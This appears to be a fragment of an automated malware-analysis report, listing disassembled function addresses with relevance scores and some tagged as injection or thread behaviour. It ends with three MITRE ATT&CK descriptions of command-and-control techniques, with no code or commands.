Function 053518F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 0128590D Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 01284248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 05354050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Function 0535BC48 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Function 0535BC50 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 0535BB72 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Function 0535BB78 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 0128D620 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre